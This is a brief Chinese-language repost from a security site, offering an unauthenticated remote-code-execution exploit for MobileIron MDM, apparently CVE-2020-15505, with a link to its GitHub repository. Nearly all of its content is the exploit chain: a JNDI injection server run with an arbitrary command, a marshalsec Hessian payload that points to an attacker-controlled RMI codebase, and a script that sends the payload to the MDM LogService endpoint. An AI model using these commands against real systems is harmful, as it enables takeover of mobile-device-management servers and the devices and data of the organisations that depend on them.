MobileIron MDM 未授权RCE EXP

admin 2020年9月14日19:33:52评论457 views字数 382阅读1分16秒阅读模式

MOBILEIRON MDM 未授权RCE EXP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command>"
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<server-ip>:1099/<codebase> > exp
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService

MobileIron MDM 未授权RCE EXP

MobileIron MDM 未授权RCE EXP


https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月14日19:33:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MobileIron MDM 未授权RCE EXPhttp://cn-sec.com/archives/132036.html

发表评论

匿名网友 填写信息